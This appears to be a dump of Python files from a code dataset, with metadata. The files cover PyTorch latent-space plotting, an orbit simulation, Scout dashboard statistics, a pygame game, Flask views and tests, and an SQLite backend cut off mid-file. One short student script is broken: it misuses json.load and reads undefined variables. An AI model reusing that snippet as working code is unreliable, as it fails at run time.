plot_inter(img1, img2, num_steps=10, grid_row_size=10, figsize=(30, 30), filename=None):\n \"\"\"\n Plot interpolation between two images.\n\n :param img1: image 1\n :param img2: image 2\n :param num_steps: number of images to interpolate between image 1 and 2\n :param grid_row_size: number of images in one row in the grid\n :param figsize: the size of the generated plot\n :param filename: file name under which the plot will be saved. (optional)\n :return: None\n \"\"\"\n\n img_lst = []\n for p in np.linspace(0, 1, num=num_steps):\n img_temp = p * img1 + (1 - p) * img2\n img_lst.append(img_temp)\n\n img = torch.stack(img_lst)\n\n imshow(torchvision.utils.make_grid(img.detach(), grid_row_size), figsize, filename if (filename is not None) else None)\n\n\n\ndef plot_inter_latent(loader, model, latent_dim, num_steps=8, num_sample=1, figsize=(30, 30), filename=None):\n \"\"\"\n Plot latent space interpolation between two images from a data loader. Attention: num_steps * num_sample can not be\n bigger the batch size of the loader (This problem will be solved in the future)\n\n :param loader: loader that wraps the train, test or evaluation set\n :param model: INN used to project the images into the latent space\n :param latent_dim: dimension of the latent space\n :param num_steps: number of images to interpolate between two images\n :param num_sample: number of images to plot\n :param figsize: the size of the generated plot\n :param filename: file name under which the plot will be saved. (optional)\n :return: None\n \"\"\"\n\n img, label = next(iter(loader))\n\n model.to('cpu')\n model.eval()\n\n lat_img = model(img)\n lat_shape = lat_img.shape\n lat_img = lat_img.view(lat_img.size(0), -1)\n\n lat_img_int = []\n for i in range(int(len(lat_img) / num_steps)):\n if i == (len(lat_img) - 1):\n for p in np.linspace(0, 1, num=num_steps):\n lat_img_int_img = p * lat_img[i].detach().numpy() + (1 - p) * lat_img[0].detach().numpy()\n lat_img_int.append(lat_img_int_img)\n else:\n for p in np.linspace(0, 1, num=num_steps):\n lat_img_int_img = p * lat_img[i].detach().numpy() + (1 - p) * lat_img[i + 1].detach().numpy()\n lat_img_int.append(lat_img_int_img)\n\n lat_img_int = np.array(lat_img_int)\n lat_img_int = torch.from_numpy(lat_img_int)\n\n lat_img_mod = torch.cat([lat_img_int[:, :latent_dim], lat_img_int.new_zeros((lat_img_int[:, latent_dim:]).shape)], dim=1)\n lat_img_mod = lat_img_mod.view(lat_shape)\n\n output = model(lat_img_mod, rev=True)\n\n counter = 0\n for num in range(num_sample):\n inter_row_lst = []\n for i in range(num_steps):\n inter_row_lst.append(output[counter])\n counter += 1\n inter_row = torch.stack(inter_row_lst)\n imshow(torchvision.utils.make_grid(inter_row.detach(), num_steps), figsize,\n filename + \"_interpolation_{}\".format(num) if (filename is not None) else None)\n\n\n\ndef plot_samples(model, latent_dim, input_size, input_shape, num_sample=1, grid_row_size=10, figsize=(30, 30), filename=None):\n \"\"\"\n Generates samples from learned distribution by sampling prior and decoding.\n\n :param model: INN used for sampling\n :param latent_dim: dimension of the latent space\n :param input_size: total number of elements in the input of the INN\n :param input_shape: shape of the input for the INN\n :param num_sample: number of samples to generate\n :param grid_row_size: number of images in one row in the grid\n :param figsize: the size of the generated plot\n :param filename: file name under which the plot will be saved. (optional)\n :return: None\n \"\"\"\n\n model.to('cpu')\n model.eval()\n\n prior_samples = tra.traverse_continous_grid(latent_dim, input_size, None, 0, num_sample, grid_row_size, True)\n\n if len(input_shape) == 2:\n prior_samples = prior_samples.view(num_sample, input_shape[0], input_shape[1])\n elif len(input_shape) == 3:\n prior_samples = prior_samples.view(num_sample, input_shape[0], input_shape[1], input_shape[2])\n else:\n raise ValueError(\"input_shape is neither 2- nor 3-dimensional\")\n\n generate = model(prior_samples, rev=True)\n\n imshow(torchvision.utils.make_grid(generate.detach(), grid_row_size), figsize, filename if (filename is not None) else None)\n\n\ndef plot_latent_traversal_line(model, latent_dim, input_size, input_shape, idx, num_sample=1, figsize=(30, 30), filename=None, dataset=None, conditional_target=None, device='cpu'):\n \"\"\"\n Generates an image traversal through a latent dimension.\n\n :param model: INN used for sampling\n :param latent_dim: dimension of the latent space\n :param input_size: total number of elements in the input of the INN\n :param input_shape: shape of the input for the INN\n :param idx: Index of a continuous latent dimension to traverse. If None, no latent is traversed and all latent\n dimensions are randomly sampled or kept fixed.\n :param num_sample: number of samples to generate\n :param figsize: the size of the generated plot\n :param filename: file name under which the plot will be saved. (optional)\n :param dataset: dataset to draw images from for which the latent traversal will be created\n :return: None\n \"\"\"\n\n model.to(device)\n model.eval()\n\n if dataset is not None:\n loader = dl.get_loader(dataset, num_sample)\n\n img, label = next(iter(loader))\n\n lat_img = model(img)\n lat_img = lat_img.view(lat_img.size(0), -1)\n else:\n lat_img = None\n\n latent_samples = tra.traverse_continous_line(latent_dim, input_size, idx, num_sample, False, lat_img, conditional_target=conditional_target)\n\n if len(input_shape) == 2:\n latent_samples = latent_samples.view(num_sample, input_shape[0], input_shape[1])\n elif len(input_shape) == 3:\n latent_samples = latent_samples.view(num_sample, input_shape[0], input_shape[1], input_shape[2])\n else:\n raise ValueError(\"input_shape is neither 2- nor 3-dimensional\")\n\n generate = model(latent_samples.to(device), rev=True)\n\n imshow(torchvision.utils.make_grid(generate.detach(), num_sample), figsize, filename if (filename is not None) else None)\n\n\ndef plot_all_traversals_grid(model, latent_dim, input_size, input_shape, num_sample=1, figsize=(30, 30), filename=None, conditional_target=None, device='cpu'):\n \"\"\"\n Generates a grid of images for all latent dimensions, where each row corresponds to a traversal along a latent\n dimension.\n\n :param model: INN used for sampling\n :param latent_dim: dimension of the latent space\n :param input_size: total number of elements in the input of the INN\n :param input_shape: shape of the input for the INN\n :param idx: Index of a continuous latent dimension to traverse. If None, no latent is traversed and all latent\n dimensions are randomly sampled or kept fixed.\n :param num_sample: number of samples to generate\n :param figsize: the size of the generated plot\n :param filename: file name under which the plot will be saved. (optional)\n :return: None\n \"\"\"\n \n model.to(device)\n model.eval()\n \n if len(input_shape) != 3:\n raise ValueError(\"input_shape must be 3-dimensional\")\n \n\n grid = [] \n for idx in range(latent_dim):\n latent_samples = tra.traverse_continous_line(latent_dim, input_size, idx, num_sample, False, lat_img=None, conditional_target=conditional_target)\n \n latent_samples = latent_samples.view(num_sample, input_shape[0], input_shape[1], input_shape[2])\n\n generate = model(latent_samples.to(device), rev=True)\n \n grid.append(generate)\n \n grid = torch.cat(grid)\n\n imshow(torchvision.utils.make_grid(grid.detach(), num_sample), figsize, filename if (filename is not None) else None)\n\n\ndef plot_latent_traversal_grid(model, latent_dim, input_size, input_shape, idx, axis=0, num_sample=1, grid_row_size=10, figsize=(30, 30), filename=None, idx_2=None):\n \"\"\"\n Generates a grid of image traversals through two latent dimensions.\n\n :param model: INN used for sampling\n :param latent_dim: dimension of the latent space\n :param input_size: total number of elements in the input of the INN\n :param input_shape: shape of the input for the INN\n :param idx: Index of a continuous latent dimension to traverse. If None, no latent is traversed and all latent\n dimensions are randomly sampled or kept fixed.\n :param axis: Either 0 for traversal across the rows or 1 for traversal across the columns.\n :param num_sample: number of samples to generate\n :param grid_row_size: number of images in one row in the grid\n :param figsize: the size of the generated plot\n :param filename: file name under which the plot will be saved. (optional)\n :return: None\n \"\"\"\n\n latent_samples = tra.traverse_continous_grid(latent_dim, input_size, idx, axis, num_sample, grid_row_size, idx_2=idx_2)\n\n if len(input_shape) == 2:\n latent_samples = latent_samples.view(num_sample, input_shape[0], input_shape[1])\n elif len(input_shape) == 3:\n latent_samples = latent_samples.view(num_sample, input_shape[0], input_shape[1], input_shape[2])\n else:\n raise ValueError(\"input_shape is neither 2- nor 3-dimensional\")\n\n generate = model(latent_samples, rev=True)\n\n imshow(torchvision.utils.make_grid(generate.detach(), grid_row_size), figsize, filename if (filename is not None) else None)\n\n\ndef plot_all_traversals(model, latent_dim, input_size, input_shape, num_sample=8, figsize=(30, 30), filename=None, conditional_target=None, device='cpu'):\n \"\"\"\n Generates a grid of images for all latent dimensions, where each row corresponds to a traversal along a latent\n dimension.\n\n :param model: INN used for sampling\n :param latent_dim: dimension of the latent space\n :param input_size: size of the input for INN\n :param num_sample: Number of samples for each latent traversal\n :param figsize: the size of the generated plot\n :param filename: file name under which the plot will be saved. (optional)\n :return: None\n \"\"\"\n\n #latent_samples = []\n\n for idx in range(latent_dim):\n plot_latent_traversal_line(model, latent_dim, input_size, input_shape, idx, num_sample, figsize, filename, conditional_target=conditional_target, device=device)\n\n #imshow(torchvision.utils.make_grid(generate.detach(), num_sample), figsize, filename if (filename is not None) else None)\n\n\n\n\n\n\n\n\n","sub_path":"functionalities/.ipynb_checkpoints/plot-checkpoint.py","file_name":"plot-checkpoint.py","file_ext":"py","file_size_in_byte":18046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"449779879","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\nh = 0.01\ntiempo = 400\nR = 2\n\npt = np.arange(0,tiempo,h)\nlvx = np.arange(0,1,0.05)\n\nax = []\nay = []\nvx = []\nvy = []\n\ncuerpo = plt.Circle((0, 0), R,lw=1,alpha=0.5)\nplt.gcf().gca().add_artist(cuerpo)\n\nfor vx0 in lvx:\n x = 0\n y = 7\n vx = [vx0]\n vy = [0]\n px = [0,x]\n py = [0,y]\n for t in pt:\n ax.append(-x / (x**2 + y**2) ** (1.5))\n ay.append(-y / (x**2 + y**2) ** (1.5))\n vx.append(vx[-1] + ax[-1] * h)\n vy.append(vy[-1] + ay[-1] * h)\n x = x + vx[-1] * h\n y = y + vy[-1] * h\n if x >= 20:\n break\n if x**2 + y**2 <= R**2:\n break\n px.append(x)\n py.append(y)\n\n plt.plot(px,py)\nplt.show()\n","sub_path":"FisicaComputacional/QuintaPractica/1_1.py","file_name":"1_1.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"477719013","text":"import logging\n\nLOG = logging.getLogger(__name__)\n\ndef get_dashboard_info(adapter, institute_id=None):\n \"\"\"Returns cases with phenotype\n \n If phenotypes are provided search for only those\n \n Args:\n adapter(adapter.MongoAdapter)\n institute_id(str)\n \n Returns:\n data(dict): Dictionary with relevant information\n \"\"\"\n general_info = get_general_case_info(adapter, institute_id)\n total_cases = general_info['total_cases']\n \n data = {'total_cases': total_cases}\n if total_cases == 0:\n return data\n \n data['pedigree'] = []\n for ped_info in general_info['pedigree'].values():\n ped_info['percent'] = ped_info['count'] / total_cases\n data['pedigree'].append(ped_info)\n \n \n data['cases'] = get_case_groups(adapter, total_cases, institute_id)\n \n data['analysis_types'] = get_analysis_types(adapter, total_cases, institute_id)\n\n # Fetch variant information\n LOG.info(\"Fetch sanger variants\")\n validation_query = {'sanger_ordered': True}\n\n # Case level information\n validation_cases = set()\n validated_cases = set()\n \n # Variant level information\n validated_tp = set()\n validated_fp = set()\n\n LOG.info(\"Find all validated variants with query {}\".format(institute_id))\n validation_ordered = adapter.variant_collection.find(validation_query)\n\n case_ids = general_info['case_ids']\n nr_ordered = 0\n for nr_ordered, variant in enumerate(validation_ordered,1):\n case_id = variant['case_id']\n if institute_id:\n if not case_id in case_ids:\n continue\n variant_id = variant['_id']\n # Add case id to validation cases\n validation_cases.add(case_id)\n\n validation = variant.get('validation')\n if validation == 'True positive':\n validated_tp.add(variant_id)\n validated_cases.add(case_id)\n\n elif validation == 'False positive':\n validated_fp.add(variant_id)\n validated_cases.add(case_id)\n \n nr_validation_cases = len(validation_cases)\n\n overview = [\n {\n 'title': 'Phenotype terms',\n 'count': general_info['phenotype_cases'],\n 'percent': general_info['phenotype_cases'] / total_cases,\n }, \n {\n 'title': 'Causative variants',\n 'count': general_info['causative_cases'],\n 'percent': general_info['causative_cases'] / total_cases,\n }, \n {\n 'title': 'Pinned variants',\n 'count': general_info['pinned_cases'],\n 'percent': general_info['pinned_cases'] / total_cases,\n }, \n {\n 'title': 'Cohort tag',\n 'count': general_info['cohort_cases'],\n 'percent': general_info['cohort_cases'] / total_cases,\n }\n ]\n if nr_validation_cases:\n overview.append(\n {\n 'title': 'Validation ordered',\n 'count': nr_validation_cases,\n 'percent': nr_validation_cases / total_cases,\n })\n overview.append(\n {\n 'title': 'Validated',\n 'count': len(validated_cases),\n 'percent': len(validated_cases) / nr_validation_cases,\n })\n\n data['overview'] = overview\n \n variants = []\n nr_validated = len(validated_tp) + len(validated_fp)\n if nr_ordered:\n variants.append(\n {\n 'title': 'Validation ordered',\n 'count': nr_ordered,\n 'percent': 1\n }\n )\n if nr_validated:\n variants.append(\n {\n 'title': 'Validated True Positive',\n 'count': len(validated_tp),\n 'percent': len(validated_tp) / nr_validated,\n }\n )\n \n variants.append(\n {\n 'title': 'Validated False Positive',\n 'count': len(validated_fp),\n 'percent': len(validated_fp) / nr_validated,\n }\n )\n \n data['variants'] = variants\n \n return data\n\ndef get_general_case_info(adapter, institute_id=None):\n \"\"\"Return general information about cases\n \n Args:\n adapter(adapter.MongoAdapter)\n institute_id(str)\n \n Returns:\n general(dict)\n \"\"\"\n general = {}\n # Fetch information about cases with certain activities\n cases = adapter.cases(collaborator=institute_id)\n \n phenotype_cases = 0\n causative_cases = 0\n pinned_cases = 0\n cohort_cases = 0\n \n pedigree = {\n 1: {\n 'title': 'Single',\n 'count': 0\n },\n 2: {\n 'title': 'Duo',\n 'count': 0\n },\n 3: {\n 'title': 'Trio',\n 'count': 0\n },\n 'many': {\n 'title': 'Many',\n 'count': 0\n },\n }\n \n case_ids = set()\n \n total_cases = 0\n for total_cases,case in enumerate(cases,1):\n # If only looking at one institute we need to save the case ids\n if institute_id:\n case_ids.add(case['_id'])\n if case.get('phenotype_terms'):\n phenotype_cases += 1\n if case.get('causatives'):\n causative_cases += 1\n if case.get('suspects'):\n pinned_cases += 1\n if case.get('cohorts'):\n cohort_cases += 1\n \n nr_individuals = len(case.get('individuals',[]))\n if nr_individuals == 0:\n continue\n if nr_individuals > 3:\n pedigree['many']['count'] += 1\n else:\n pedigree[nr_individuals]['count'] += 1\n \n general['total_cases'] = total_cases\n general['phenotype_cases'] = phenotype_cases\n general['causative_cases'] = causative_cases\n general['pinned_cases'] = pinned_cases\n general['cohort_cases'] = cohort_cases\n general['pedigree'] = pedigree\n general['case_ids'] = case_ids\n\n return general\n \n\ndef get_case_groups(adapter, total_cases, institute_id=None):\n \"\"\"Return the information about case groups\n \n Args:\n store(adapter.MongoAdapter)\n total_cases(int): Total number of cases\n \n Returns:\n cases(dict):\n \"\"\"\n # Create a group with all cases in the database\n cases = [{'status': 'all', 'count': total_cases, 'percent': 1}]\n # Group the cases based on their status\n pipeline = []\n group = {'$group' : {'_id': '$status', 'count': {'$sum': 1}}}\n query = {}\n if institute_id:\n query = {'$match': {'owner': institute_id}}\n \n if query:\n pipeline.append(query)\n\n pipeline.append(group)\n res = adapter.case_collection.aggregate(pipeline)\n \n for status_group in res:\n cases.append({'status': status_group['_id'],\n 'count': status_group['count'],\n 'percent': status_group['count'] / total_cases})\n \n return cases\n\ndef get_analysis_types(adapter, total_cases, institute_id=None):\n \"\"\"Return information about case status\"\"\"\n # Group cases based on analysis type of the individuals\n query = {}\n if institute_id:\n query = {'$match': {'owner': institute_id}}\n \n pipeline = []\n if query:\n pipeline.append(query)\n \n pipeline.append({'$unwind': '$individuals'})\n pipeline.append({'$group': {'_id': '$individuals.analysis_type', 'count': {'$sum': 1}}})\n analysis_query = adapter.case_collection.aggregate(pipeline)\n analysis_types = [{'name': group['_id'], 'count': group['count']} for group in analysis_query]\n \n return analysis_types","sub_path":"scout/server/blueprints/dashboard/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":7656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"36060568","text":"import random\r\nimport pygame\r\npygame.init()\r\n\r\nWIDTH = 800\r\nHEIGHT = 600\r\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\r\n\r\nhero = pygame.sprite.Sprite()\r\nhero.image = pygame.image.load('spriteguyc.png')\r\nhero.rect = hero.image.get_rect()\r\nhero_group = pygame.sprite.GroupSingle(hero)\r\n\r\nTILE_SIZE = 10 # This makes each frame 10x10px\r\nNUM_TILES_WIDTH = 128\r\nNUM_TILES_HEIGHT = 80\r\n\r\nmunch_sounda = pygame.mixer.Sound('noma.wav') # Just a few sounds for the sprite eating the candy\r\nmunch_soundb = pygame.mixer.Sound('nomb.wav') # \" \"\r\nmunch_soundc = pygame.mixer.Sound('nomc.wav') # \" \"\r\n\r\ncandies = pygame.sprite.OrderedUpdates()\r\n\r\n\r\ndef add_candy(candies): # This is the function I use to spawn the candies onto the screen\r\n candy = pygame.sprite.Sprite()\r\n candy.image = pygame.image.load('candy.png')\r\n candy.rect = candy.image.get_rect()\r\n candy.rect.left = random.randint(10, int(NUM_TILES_WIDTH) - 10) * int(TILE_SIZE)\r\n candy.rect.top = random.randint(10, int(NUM_TILES_HEIGHT) - 10) * int(TILE_SIZE)\r\n candies.add(candy)\r\n\r\n\r\nfor i in range(10):\r\n add_candy(candies)\r\n\r\niteration = 0\r\n\r\nheropos = 0\r\nheroposa = 0\r\n\r\nheld = [] # This is the list that will hold all of the keys that are being pressed, every time the main loop iterates\r\n# it reads through and checks what \"movements\" there are and does them.\r\nfinish = False # Main loop\r\nwin = False # Keeps the game running and candy spawning while false\r\nscore = 0 # Setting the score variable, will be raised in intervals of 50, 50 per candy collected, will be replaced\r\n# gold, the same basic thing will be used for exp and stuff\r\n\r\nclock = pygame.time.Clock()\r\nclock.tick(120)\r\n\r\nwhile not finish:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n finish = True\r\n if event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\r\n finish = True\r\n if event.type == pygame.KEYDOWN:\r\n held.append(event.key) # This is the held list being appended with whatever key is being held\r\n elif event.type == pygame.KEYUP:\r\n held.remove(event.key) # \" \"\r\n if event.type == pygame.USEREVENT:\r\n if not win: # This is just seeing if the game is not over, otherwise it keeps adding candies once you win\r\n add_candy(candies)\r\n screen.fill((50, 50, 50)) # This is to avoid the hero leaving a trail\r\n # update hero position\r\n if pygame.K_UP in held: # This checks if the UP arrow key is in the held list\r\n hero.rect.top -= TILE_SIZE # This takes the amount of times that the UP arrow key is in the list and moves the\r\n # sprite that many times\r\n heroposa = hero.rect.top\r\n if pygame.K_DOWN in held: # This checks if the DOWN arrow key is in the held list\r\n hero.rect.top += TILE_SIZE # This takes the amount of times that the DOWN arrow key is in the list and moves\r\n # the sprite that many times\r\n heroposa = hero.rect.top\r\n if pygame.K_RIGHT in held: # This checks if the RIGHT arrow key is in the the held list\r\n hero.rect.right += TILE_SIZE # This takes the amount of times that the RIGHT arrow key is in the list and moves\r\n # the sprite that many times\r\n heropos = hero.rect.right\r\n heroposa = hero.rect.top\r\n hero = pygame.sprite.Sprite()\r\n hero.image = pygame.image.load('spriteguyc.png')\r\n hero.rect = hero.image.get_rect()\r\n hero_group = pygame.sprite.GroupSingle(hero)\r\n hero.rect.right = heropos\r\n hero.rect.top = heroposa\r\n if pygame.K_LEFT in held: # This checks if the LEFT arrow key is in the held list\r\n hero.rect.right -= TILE_SIZE # This takes the amount of times that the LEFT arrow key is in the list and moves\r\n # the sprite that many times\r\n heropos = hero.rect.right\r\n heroposa = hero.rect.top\r\n hero = pygame.sprite.Sprite()\r\n hero.image = pygame.image.load('spriteguyd.png')\r\n hero.rect = hero.image.get_rect()\r\n hero_group = pygame.sprite.GroupSingle(hero)\r\n hero.rect.right = heropos\r\n hero.rect.top = heroposa\r\n hero.rect.clamp_ip(screen.get_rect()) # This keeps the sprite from moving outside of the screen\r\n hero_group.draw(screen) # This draws the objects in the \"hero_group\" to the \"screen\"\r\n if not win: # This checks that the game is not over\r\n if iteration % 50 == 0: # This is just a steady rate of spawning candies, not too fast, not too slow\r\n add_candy(candies)\r\n candies.draw(screen)\r\n collides = pygame.sprite.groupcollide(hero_group, candies, False, True) # So when the sprite and the candies\r\n # collide the candies disappear\r\n if len(collides) > 0: # This checks if the length of the value of collides is greater than 0, if it is, then a\r\n # collision has occurred\r\n score += 50 # This is the score, it is raised in lots of 50\r\n roll = random.randint(0, 2) # This rolls between 3 values, 0, 1 and 2, this is used to determine the \"munch\" sound\r\n if roll == 0:\r\n if len(collides) > 0:\r\n munch_sounda.play() # The sfx for eating the candy, variant a\r\n elif roll == 1:\r\n if len(collides) > 0:\r\n munch_soundb.play() # The sfx for eating the candy, variant b\r\n elif roll == 2:\r\n if len(collides) > 0:\r\n munch_soundc.play() # The sfx for eating the candy, variant c\r\n pygame.sprite.groupcollide(hero_group, candies, False, True)\r\n if len(candies) == 0:\r\n win = True # Making this true, makes the candies stop spawning\r\n if win: # Again, checks if \"win\" is true\r\n text_score = str(score) + \" points\" # This one is just making the score into a string and then formatting it\r\n # how I want it\r\n font = pygame.font.Font(None, 36)\r\n text_image = font.render(\"You Win! \" + text_score, True, (255, 255, 255))\r\n text_rect = text_image.get_rect(centerx=WIDTH/2, centery=100)\r\n screen.blit(text_image, text_rect)\r\n if not win: # While the game is going\r\n text_score = str(score) + \" points\" # same as before\r\n score_font = pygame.font.Font(None, 30)\r\n score_image = score_font.render(text_score, True, (255, 255, 255))\r\n score_rect = score_image.get_rect(centerx=100, centery=100)\r\n screen.blit(score_image, score_rect)\r\n pygame.display.update() # Updates the screen with all the new changes\r\n iteration += 1 # This is for the candy spawning\r\npygame.quit()\r\n","sub_path":"runnergameSubmission-Day/testingpygame.py","file_name":"testingpygame.py","file_ext":"py","file_size_in_byte":6703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"510054936","text":"from flask.views import MethodView\nfrom flask import render_template, request\nfrom opentera.services.ServiceAccessManager import ServiceAccessManager, current_participant_client\n\n\nclass ParticipantDashboard(MethodView):\n\n def __init__(self, *args, **kwargs):\n self.flaskModule = kwargs.get('flaskModule', None)\n\n @ServiceAccessManager.token_required(allow_static_tokens=True, allow_dynamic_tokens=False)\n def get(self):\n # print('get')\n\n hostname = self.flaskModule.config.service_config['hostname']\n port = self.flaskModule.config.service_config['port']\n backend_hostname = self.flaskModule.config.backend_config['hostname']\n backend_port = self.flaskModule.config.backend_config['port']\n if 'X_EXTERNALHOST' in request.headers:\n backend_hostname = request.headers['X_EXTERNALHOST']\n\n if 'X_EXTERNALPORT' in request.headers:\n backend_port = request.headers['X_EXTERNALPORT']\n\n participant_name = \"Anonymous\"\n\n if current_participant_client:\n participant_info = current_participant_client.get_participant_infos()\n if participant_info and 'participant_name' in participant_info:\n participant_name = participant_info['participant_name']\n\n return render_template('participant_dashboard.html', hostname=hostname, port=port,\n backend_hostname=backend_hostname, backend_port=backend_port,\n participant_name=participant_name,\n participant_token=current_participant_client.participant_token,\n participant_uuid=current_participant_client.participant_uuid\n )\n","sub_path":"teraserver/python/services/VideoRehabService/Views/ParticipantDashboard.py","file_name":"ParticipantDashboard.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"648032329","text":"import json\nwith open(\"estoque.json\", \"r\") as arquivo:\n cont = arquivo.read()\ndic = json.load(cont)\nsoma = 0\nfor i in dic[\"produtos\"]:\n valor_ = dic[\"quantidade\"]*dic[\"valor\"]\n soma += valor\nprint(soma)\n ","sub_path":"backup/user_270/ch159_2020_05_06_12_30_20_965187.py","file_name":"ch159_2020_05_06_12_30_20_965187.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"624581290","text":"from app import app\nimport app as apper\nimport unittest\nimport json\nimport os\nimport tempfile\n\n\nclass LocatorTest(unittest.TestCase):\n\n insert_data = json.dumps({\n 'pin': 'IN/110001',\n 'name': 'Connaught Place',\n 'admin': 'New Delhi',\n 'lat': 28.6333,\n 'lon': 77.2167,\n })\n\n data = json.dumps({\n 'latitude': 28.6333,\n 'longitude': 77.2167,\n 'radius': 5.0,\n })\n\n headers = {\n 'Content-Type': 'application/json',\n 'Accept': 'application/json',\n }\n\n insert_sql = \"Insert into Location values (?,?,?,?,?,?)\"\n select_sql = \"Select * from Location\"\n\n def setUp(self):\n app.config['TESTING'] = True\n self.db_fd, app.config['DATABASE'] = tempfile.mkstemp()\n\n self.app = app.test_client()\n apper.init_db()\n\n def tearDown(self):\n os.close(self.db_fd)\n os.unlink(app.config['DATABASE'])\n\n def test_database(self):\n test = os.path.exists('apper.db')\n self.assertFalse(test)\n\n def test_emptyDb(self):\n with app.app_context():\n cur = apper.get_db().cursor()\n d = cur.fetchall()\n self.assertEqual(len(d), 0)\n\n def test_firstInsertDb(self):\n data = ('1','Gurgaon', 'Haryana', 45.23, 23.21, 5)\n with app.app_context():\n cur = apper.get_db().cursor()\n cur.execute(self.insert_sql, data)\n self.assertEqual(cur.lastrowid, 1)\n\n def test_updateDb(self):\n data = ('1', 'Gurgaon', 'Haryana', 45.23, 23.21, 5)\n with app.app_context():\n conn = apper.get_db()\n cur = conn.cursor()\n cur.execute(self.insert_sql, data)\n conn.commit()\n\n sql2 = \"Update Location set place_name='South Delhi' where accuracy=5\"\n cur.execute(sql2)\n conn.commit()\n\n #sql3 = \"Select * from Location\" #\" where place_name='Gurgaon'\"\n cur.execute(self.select_sql)\n d = cur.fetchone()\n\n self.assertEqual(d['place_name'], 'South Delhi')\n\n def test_dbSelectQuery(self):\n data = ('1','Gurgaon', 'Haryana', 45.23, 23.21, 5)\n with app.app_context():\n conn = apper.get_db()\n cur = conn.cursor()\n #sql1 = \"INSERT INTO Location VALUES ('1', 'Gurgaon', 'Haryana', 45.23, 23.21, 5)\"\n cur.execute(self.insert_sql, data)\n conn.commit()\n\n sql2 = \"SELECT * FROM Location where accuracy=0\"\n cur.execute(sql2)\n d = cur.fetchall()\n\n self.assertEqual(len(d), 0)\n\n def test_schemaSql(self):\n pass\n\n def test_main(self):\n resp = self.app.get('/', follow_redirects=True)\n self.assertEqual(resp.status_code, 404)\n\n def test_get1(self):\n resp = self.app.get('/get_using_self', follow_redirects=True)\n self.assertEqual(resp.status_code, 200)\n\n def test_get2(self):\n resp = self.app.get('/get_using_postgres', follow_redirects=True)\n self.assertEqual(resp.status_code, 200)\n\n def test_post1(self):\n resp = self.app.get('/post_location', follow_redirects=True)\n self.assertEqual(resp.status_code, 405)\n\n def test_post2(self):\n resp = self.app.post('/post_location', data=self.insert_data, headers=self.headers)\n data = json.loads(resp.get_data(as_text=True))\n self.assertEqual(resp.status_code, 200)\n\n def test_postApi(self):\n resp = self.app.post('/post_location', data=self.insert_data, headers=self.headers)\n data = json.loads(resp.get_data(as_text=True))\n self.assertEqual(data['msg'], 'Already present')\n\n def testPostWrongData(self):\n insert_data = json.dumps({\n 'pin':'IN/810001',\n 'admin':'New Delhi',\n 'lat':28.6333,\n 'lon':77.2167,\n })\n res = self.app.post(\"/post_location\", data=insert_data, headers=self.headers)\n data = json.loads(res.get_data(as_text=True))\n self.assertEqual(data['msg'], 'Incomplete data')\n\n def testCompareGetApis(self):\n res1 = self.app.get(\"/get_using_postgres\", data=self.data, headers=self.headers)\n data1 = json.loads(res1.get_data(as_text=True))\n\n res2 = self.app.get(\"/get_using_self\", data=self.data, headers=self.headers)\n data2 = json.loads(res2.get_data(as_text=True))\n\n self.assertEqual(data1['number'], data2['number'])\n\n\nif __name__ == '__main__':\n unittest.main() \n\n","sub_path":"test12.py","file_name":"test12.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"426675818","text":"\"\"\"\r\nthe base world on which all the other worlds are based\r\n\"\"\"\r\nimport numpy as np\r\n\r\nclass World(object):\r\n \"\"\" \r\n The base class for creating a new world \r\n \"\"\"\r\n def __init__(self, lifespan=None):\r\n \"\"\" \r\n Initialize a new world with some benign default values \r\n \"\"\"\r\n if lifespan is None:\r\n self.LIFESPAN = 10 ** 4\r\n else:\r\n self.LIFESPAN = lifespan\r\n # Starting at -1 allows for an intialization pass.\r\n self.timestep = -1\r\n self.world_visualize_period = 1e4\r\n self.brain_visualize_period = 1e4\r\n self.name = 'abstract base world'\r\n # These will likely be overridden in any subclass\r\n self.num_sensors = 0\r\n self.num_actions = 0\r\n self.classifier = False\r\n \r\n def step(self, action):\r\n \"\"\" \r\n Take a timestep through an empty world that does nothing \r\n \"\"\"\r\n self.timestep += 1\r\n sensors = np.zeros(self.num_sensors)\r\n reward = 0\r\n return sensors, reward\r\n \r\n def is_alive(self):\r\n \"\"\" \r\n Returns True when the world has come to an end \r\n \"\"\"\r\n if(self.timestep < self.LIFESPAN):\r\n return True\r\n else:\r\n return False\r\n \r\n def visualize(self, brain):\r\n \"\"\" \r\n Let the world show BECCA's internal state as well as its own\r\n \"\"\"\r\n if (self.timestep % self.world_visualize_period) == 0:\r\n self.visualize_world()\r\n if (self.timestep % self.brain_visualize_period) == 0:\r\n brain.visualize()\r\n\r\n def visualize_world(self):\r\n print('{0} is {1} time steps old.'.format(self.name, self.timestep))\r\n\r\n","sub_path":"worlds/base_world.py","file_name":"base_world.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"231092242","text":"from base import Backend\nimport sqlite3 as lite\nfrom bgp_controller.prefix_table import Prefix, PrefixTable\nfrom datetime import timedelta\n\nimport os\n\nimport logging\nlogger = logging.getLogger('sir')\n\n# TODO Save BGP in SQL?\n\nclass SQLite(Backend):\n \"\"\"\n Name:\n SQLite\n Author:\n David Barroso \n Description:\n This backend connects to a SQLite database. It will choose the best prefixes by the amount of data reported by pmacct.\n Configuration:\n * **sqlite_file** - Full path to the database file.\n * **retention** - How many days to keep pmacct raw data and best_prefixes data.\n Example:\n Configuration example::\n\n backend_options:\n sqlite_file: 